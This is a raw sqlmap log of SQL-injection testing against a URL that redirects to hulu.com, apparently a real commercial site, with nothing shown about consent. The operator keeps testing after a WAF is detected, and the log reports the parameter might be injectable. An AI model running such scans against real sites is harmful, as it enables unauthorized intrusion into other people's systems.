http://www.huluoffer.com/WaveBB
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:08:15 /2019-08-24/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[12:08:15] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3' from file '/root/sqlmap/data/txt/user-agents.txt'
[12:08:15] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[12:08:16] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to 'http://www.hulu.com/start/1monthfree?cmp=6209'. Do you want to follow? [Y/n] Y
[12:08:16] [INFO] heuristics detected web page charset 'ascii'
[12:08:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:08:49] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[12:08:49] [WARNING] please consider usage of tamper scripts (option '--tamper')
[12:08:49] [INFO] testing if the target URL content is stable
[12:08:57] [WARNING] URI parameter '#1*' does not appear to be dynamic
[12:09:03] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:09:09] [INFO] testing for SQL injection on URI parameter '#1*'
[12:09:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:16:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[12:16:16] [WARNING] reflective value(s) found and filtering out
[12:20:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[12:26:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:28:02] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[12:28:02] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:29:32] [CRITICAL] connection timed out to the target URL
[12:31:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:32:44] [CRITICAL] connection timed out to the target URL
[12:33:54] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:35:24] [CRITICAL] connection timed out to the target URL
[12:36:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:37:44] [CRITICAL] connection timed out to the target URL
[12:37:44] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable 
[12:37:44] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:37:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:37:46] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:37:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:37:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:37:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:37:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:37:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:08] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:10] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
